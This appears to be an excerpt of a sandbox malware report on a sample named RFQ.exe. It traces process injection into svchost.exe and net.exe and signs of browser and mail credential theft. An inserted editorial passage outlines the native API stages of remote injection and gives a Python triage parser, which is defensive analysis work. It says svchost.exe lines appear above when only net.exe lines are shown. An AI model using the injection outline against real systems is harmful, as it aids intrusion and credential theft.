                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752AF0: NtWriteFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752AD0: NtReadFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752F30: NtCreateSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752FE0: NtCreateFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752FB0: NtResumeThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752EE0: NtQueueApcThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752E80: NtReadVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752D30: NtUnmapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752D10: NtMapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752DF0: NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752DD0: NtDelayExecution,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752C70: NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752C60: NtCreateKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752CA0: NtQueryInformationToken,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_037535C0: NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_037539B0: NtGetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752B80: NtQueryInformationFile
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752AB0: NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752F60: NtCreateProcessEx
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752FA0: NtQuerySection
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752F90: NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752E30: NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752EA0: NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752D00: NtSetInformationFile
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752DB0: NtEnumerateKey
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752C00: NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752CF0: NtOpenProcess
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752CC0: NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03753010: NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03753090: NtSetValueKey
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03753D70: NtOpenThread
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03753D10: NtOpenProcessToken
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_02F09310: NtCreateFile
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_02F09620: NtClose
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_02F09780: NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_02F09480: NtReadFile
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_02F09580: NtDeleteFile
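The native-API lines above are listed per process, and the two processes carrying them (svchost.exe and net.exe) are not the submitted sample, which is RFQ.exe. Read together they form a complete remote-injection toolkit: obtain a target (NtOpenProcess, NtCreateProcessEx), place the payload (NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateSection with NtMapViewOfSection, NtProtectVirtualMemory) and run it (NtQueueApcThread, or NtGetContextThread / NtSetContextThread around NtSuspendThread / NtResumeThread). That set is what the report's process-injection findings reduce to. Because the evidence arrives as dozens of near-identical lines, a small parser is the practical way to turn a report like this into a per-process capability summary. The script below is an added example and not Joe Sandbox code: its regex matches the line shape of this extraction, including the path fused to "Code function:" and the function ID repeated at the end of each line, and the three-stage rule it applies is this editor's heuristic rather than a Joe Sandbox signature. The sample lines are a constructed subset copied from this section; net.exe is deliberately given only part of its real set so that the negative case is visible.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of lines copied from this section of the report, with the
# extraction artefacts kept (path fused to "Code function:", function ID repeated at the end).
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CF0 NtOpenProcess,2_2_03972CF0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F60 NtCreateProcessEx,2_2_03972F60",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E30 NtWriteVirtualMemory,2_2_03972E30",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D10 NtMapViewOfSection,2_2_03972D10",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EE0 NtQueueApcThread,2_2_03972EE0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974340 NtSetContextThread,2_2_03974340",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FB0 NtResumeThread,2_2_03972FB0",
    r"Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752B60 NtClose,LdrInitializeThunk,4_2_03752B60",
    r"Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752E30 NtWriteVirtualMemory,4_2_03752E30",
    r"Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F09580 NtDeleteFile,4_2_02F09580",
    r"Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0075B0430_2_0075B043",
]

# Function IDs are <pid-index>_<dump-index>_<8 hex digits>; the fixed width is what lets the
# regex split "0_2_0075B0430_2_0075B043" into the ID and its repeated link text.
LINE_RE = re.compile(
    r"^Source: (?P<proc>.+?)Code function: (?P<fid>\d+_\d+_[0-9A-Fa-f]{8}):? ?(?P<rest>.*)$"
)


def parse_line(line):
    """Return (process, function_id, [api, ...]) or None for lines that are not code-function entries."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    proc, fid, rest = m.group("proc"), m.group("fid"), m.group("rest")
    if rest.endswith(fid):          # drop the function ID repeated as link text
        rest = rest[: -len(fid)]
    apis = [a for a in rest.strip().rstrip(",").split(",") if a]
    return proc, fid, apis


def native_api_profile(lines):
    """Map each process path to the set of Nt*/Zw* APIs its flagged functions call."""
    profile = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        proc, _fid, apis = parsed
        profile[proc].update(a for a in apis if a.startswith(("Nt", "Zw")))
    return {p: s for p, s in profile.items() if s}


# Editor's heuristic: remote injection needs a target, a way to place bytes, and a way to run them.
TARGET = {"NtOpenProcess", "NtCreateProcessEx", "NtCreateUserProcess"}
PLACE = {"NtWriteVirtualMemory", "NtMapViewOfSection"}


def execution_primitive(apis):
    if "NtQueueApcThread" in apis:
        return "APC"
    if {"NtSetContextThread", "NtResumeThread"} <= apis:
        return "thread context hijack"
    if "NtCreateThreadEx" in apis:
        return "remote thread"
    return None


def injection_stages(apis):
    return {
        "target": sorted(apis & TARGET),
        "place": sorted(apis & PLACE),
        "execute": execution_primitive(apis),
    }


def is_injection_capable(apis):
    s = injection_stages(apis)
    return bool(s["target"]) and bool(s["place"]) and s["execute"] is not None


def summarize(lines):
    """Per-process verdict suitable for a triage note."""
    return {proc: is_injection_capable(apis) for proc, apis in native_api_profile(lines).items()}


if __name__ == "__main__":
    for proc, apis in native_api_profile(SAMPLE_LINES).items():
        flag = "INJECTION-CAPABLE" if is_injection_capable(apis) else ""
        print(proc, injection_stages(apis), flag)
```

Feed it the whole "Code function" section of a report and the output is one line per process naming which stage each API set satisfies. The RFQ.exe entry is dropped on purpose: functions listed without any API name contribute nothing to the capability profile, and a line that names only LdrInitializeThunk is kept out of the Nt set as well.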
                Source: C:\Users\user\Desktop\RFQ.exe  Code function: 0_2_00776606: CreateFileW,DeviceIoControl,CloseHandle
                Source: C:\Users\user\Desktop\RFQ.exe  Code function: 0_2_0076ACC5: _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\RFQ.exe  Code function: 0_2_007779D3: ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\Desktop\RFQ.exe  Code functions flagged by the analyzer (no API calls resolved):
                0_2_0075B043, 0_2_00743200, 0_2_00743B70, 0_2_0076410F, 0_2_007502A4, 0_2_0073E3E3,
                0_2_0076038E, 0_2_0076467F, 0_2_007506D9, 0_2_0079AACE, 0_2_00764BEF, 0_2_0075CCC1,
                0_2_0073AF50, 0_2_00736F07, 0_2_0074B11F, 0_2_007931BC, 0_2_0075D1B9, 0_2_0076724D,
                0_2_0075123A, 0_2_007393F0, 0_2_007713CA, 0_2_0074F563, 0_2_007396C0, 0_2_0077B6CC,
                0_2_0079F7FF, 0_2_007377B0, 0_2_007679C9, 0_2_0074FA57, 0_2_00739B60, 0_2_00737D19,
                0_2_0074FE6F, 0_2_00759ED0, 0_2_00737FA3, 0_2_010672C0
                Source: C:\Windows\SysWOW64\svchost.exe  Code functions flagged by the analyzer (no API calls resolved):
                2_2_00418A03, 2_2_0042F043, 2_2_004031A0, 2_2_00401200, 2_2_004102C3, 2_2_00416C43,
                2_2_00401C28, 2_2_00401C30, 2_2_00416C3E, 2_2_004014D0, 2_2_004104E3, 2_2_0040E563,
                2_2_00402D21, 2_2_00402D30, 2_2_004025DC, 2_2_004025E0, 2_2_03A003E6, 2_2_0394E3F0,
                2_2_039FA352, 2_2_039C02C0, 2_2_039E0274, 2_2_03A001AA, 2_2_039F41A2, 2_2_039F81CC,
                2_2_039DA118, 2_2_03930100, 2_2_039C8158, 2_2_039D2000, 2_2_0393C7C0, 2_2_03964750,
                2_2_03940770, 2_2_0395C6E0, 2_2_03A00591, 2_2_03940535, 2_2_039EE4F6, 2_2_039E4420,
                2_2_039F2446, 2_2_039F6BD7, 2_2_039FAB40, 2_2_0393EA80, 2_2_03A0A9A6, 2_2_039429A0,
                2_2_03956962, 2_2_039268B8, 2_2_0396E8F0, 2_2_0394A840, 2_2_03942840, 2_2_039BEFA0,
                2_2_03932FC8, 2_2_0394CFE0, 2_2_03960F30, 2_2_039E2F30, 2_2_03982F28, 2_2_039B4F40,
                2_2_03952E90, 2_2_039FCE93, 2_2_039FEEDB, 2_2_0393AE0D, 2_2_039FEE26, 2_2_03940E59,
                2_2_03958DBF, 2_2_039DCD1F, 2_2_0394AD00, 2_2_039E0CB5, 2_2_03930CF2, 2_2_03940C00,
                2_2_0398739A, 2_2_039F132D, 2_2_0392D34C, 2_2_039452A0, 2_2_0395B2C0, 2_2_039E12ED,
                2_2_0394B1B0, 2_2_03A0B16B, 2_2_0392F172, 2_2_0397516C, 2_2_039EF0CC, 2_2_039470C0,
                2_2_039F70E9, 2_2_039FF0E0, 2_2_039FF7B0, 2_2_039F16CC, 2_2_03985630, 2_2_039DD5B0,
                2_2_03A095C3, 2_2_039F7571, 2_2_039FF43F, 2_2_03931460, 2_2_0395FB80, 2_2_039B5BF0,
                2_2_0397DBF9, 2_2_039FFB76, 2_2_039DDAAC, 2_2_03985AA0, 2_2_039E1AA3, 2_2_039EDAC6,
                2_2_039FFA49, 2_2_039F7A46, 2_2_039B3A6C, 2_2_039D5910, 2_2_03949950, 2_2_0395B950,
                2_2_039438E0, 2_2_039AD800, 2_2_03941F92, 2_2_039FFFB1, 2_2_03903FD2, 2_2_03903FD5,
                2_2_039FFF09, 2_2_03949EB0, 2_2_0395FDC0, 2_2_039F1D5A, 2_2_03943D40, 2_2_039F7D73,
                2_2_039FFCF2, 2_2_039B9C32
                Source: C:\Windows\SysWOW64\net.exe  Code functions flagged by the analyzer (no API calls resolved):
                4_2_037DA352, 4_2_0372E3F0, 4_2_037E03E6, 4_2_037C0274, 4_2_037A02C0, 4_2_037A8158,
                4_2_037BA118, 4_2_03710100, 4_2_037D81CC, 4_2_037E01AA, 4_2_037D41A2, 4_2_037B2000,
                4_2_03720770, 4_2_03744750, 4_2_0371C7C0, 4_2_0373C6E0, 4_2_03720535, 4_2_037E0591,
                4_2_037D2446, 4_2_037C4420, 4_2_037CE4F6, 4_2_037DAB40, 4_2_037D6BD7, 4_2_0371EA80,
                4_2_03736962, 4_2_037229A0, 4_2_037EA9A6, 4_2_03722840, 4_2_0372A840, 4_2_0374E8F0,
                4_2_037068B8, 4_2_03794F40, 4_2_03740F30, 4_2_037C2F30, 4_2_03762F28, 4_2_0372CFE0,
                4_2_03712FC8, 4_2_0379EFA0, 4_2_03720E59, 4_2_037DEE26, 4_2_037DEEDB, 4_2_03732E90,
                4_2_037DCE93, 4_2_037BCD1F, 4_2_0372AD00, 4_2_0371ADE0, 4_2_03738DBF, 4_2_03720C00,
                4_2_03710CF2, 4_2_037C0CB5, 4_2_0370D34C, 4_2_037D132D, 4_2_0376739A, 4_2_037C12ED,
                4_2_0373B2C0, 4_2_037252A0, 4_2_0370F172, 4_2_037EB16B, 4_2_0375516C, 4_2_0372B1B0,
                4_2_037D70E9, 4_2_037DF0E0, 4_2_037CF0CC, 4_2_037270C0, 4_2_037DF7B0, 4_2_03765630,
                4_2_037D16CC, 4_2_037D7571, 4_2_037E95C3, 4_2_037BD5B0, 4_2_03711460, 4_2_037DF43F,
                4_2_037DFB76, 4_2_03795BF0, 4_2_0375DBF9, 4_2_0373FB80, 4_2_03793A6C, 4_2_037DFA49,
                4_2_037D7A46, 4_2_037CDAC6, 4_2_03765AA0, 4_2_037BDAAC, 4_2_037C1AA3, 4_2_03729950,
                4_2_0373B950, 4_2_037B5910, 4_2_0378D800, 4_2_037238E0, 4_2_037DFF09, 4_2_036E3FD5,
                4_2_036E3FD2, 4_2_037DFFB1, 4_2_03721F92, 4_2_03729EB0, 4_2_037D7D73, 4_2_037D1D5A,
                4_2_03723D40, 4_2_0373FDC0, 4_2_03799C32, 4_2_037DFCF2, 4_2_02EF1F80, 4_2_02EECEA0,
                4_2_02EED0C0, 4_2_02EEB140
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02EF55E04_2_02EF55E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02EF38204_2_02EF3820
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02EF381B4_2_02EF381B
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F0BC204_2_02F0BC20
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0357E3044_2_0357E304
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_035852244_2_03585224
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0357E1E44_2_0357E1E4
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0357D7684_2_0357D768
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0357E46C4_2_0357E46C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0392B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03975130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 039AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 039BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03987E54 appears 111 times
                Source: C:\Windows\SysWOW64\net.exe Code function: String function: 03767E54 appears 111 times
                Source: C:\Windows\SysWOW64\net.exe Code function: String function: 0379F290 appears 105 times
                Source: C:\Windows\SysWOW64\net.exe Code function: String function: 03755130 appears 58 times
                Source: C:\Windows\SysWOW64\net.exe Code function: String function: 0378EA12 appears 86 times
                Source: C:\Windows\SysWOW64\net.exe Code function: String function: 0370B970 appears 280 times
                Source: C:\Users\user\Desktop\RFQ.exe Code function: String function: 0075F8A0 appears 35 times
                Source: C:\Users\user\Desktop\RFQ.exe Code function: String function: 00756AC0 appears 42 times
                Source: C:\Users\user\Desktop\RFQ.exe Code function: String function: 0074EC2F appears 68 times
                Source: RFQ.exe, 00000000.00000003.2122123371.0000000003863000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ.exe
                Source: RFQ.exe, 00000000.00000003.2129836248.0000000003A5D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ.exe
                Source: RFQ.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/3@17/9
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_0077CE7A GetLastError,FormatMessageW,0_2_0077CE7A
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_0076AB84 AdjustTokenPrivileges,CloseHandle,0_2_0076AB84
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_0076B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0076B134
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_0077E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0077E1FD
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_00776532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00776532
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_0078C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0078C18C
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_0073406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0073406B
                Source: C:\Users\user\Desktop\RFQ.exe File created: C:\Users\user\AppData\Local\Temp\autE5C3.tmp
                Source: RFQ.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\RFQ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: net.exe, 00000004.00000003.2477498727.0000000003141000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4572237813.0000000003141000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4572237813.000000000314B000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4572237813.000000000316E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: RFQ.exe ReversingLabs: Detection: 29%
                Source: unknown Process created: C:\Users\user\Desktop\RFQ.exe "C:\Users\user\Desktop\RFQ.exe"
                Source: C:\Users\user\Desktop\RFQ.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ.exe"
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\RFQ.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\RFQ.exe Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\RFQ.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\RFQ.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\RFQ.exe Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\RFQ.exe Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\RFQ.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\RFQ.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\RFQ.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\RFQ.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\RFQ.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\RFQ.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\RFQ.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: samcli.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\net.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\net.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\net.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: RFQ.exe Static file information: File size 1217024 > 1048576
                Source: RFQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: RFQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: RFQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: RFQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: RFQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: RFQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: RFQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: net.pdbUGP source: svchost.exe, 00000002.00000003.2259882847.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2259828294.000000000321A000.00000004.00000020.00020000.00000000.sdmp, enUILRNjDql.exe, 00000003.00000003.2664550517.0000000000D3B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: enUILRNjDql.exe, 00000003.00000000.2177115370.0000000000F4E000.00000002.00000001.01000000.00000004.sdmp, enUILRNjDql.exe, 00000006.00000002.4572759882.0000000000F4E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: RFQ.exe, 00000000.00000003.2123424305.0000000003930000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000000.00000003.2122654812.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2162676008.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2160931204.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2291428628.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2291428628.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.2291348058.0000000003380000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573448074.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573448074.000000000387E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.2294260392.0000000003532000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RFQ.exe, 00000000.00000003.2123424305.0000000003930000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000000.00000003.2122654812.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2162676008.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2160931204.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2291428628.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2291428628.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, net.exe, net.exe, 00000004.00000003.2291348058.0000000003380000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573448074.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573448074.000000000387E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.2294260392.0000000003532000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: net.exe, 00000004.00000002.4572237813.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573862454.0000000003D0C000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000000.2362004164.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2588395806.000000002AE6C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: net.exe, 00000004.00000002.4572237813.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573862454.0000000003D0C000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000000.2362004164.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2588395806.000000002AE6C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: net.pdb source: svchost.exe, 00000002.00000003.2259882847.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2259828294.000000000321A000.00000004.00000020.00020000.00000000.sdmp, enUILRNjDql.exe, 00000003.00000003.2664550517.0000000000D3B000.00000004.00000001.00020000.00000000.sdmp
                Source: RFQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: RFQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
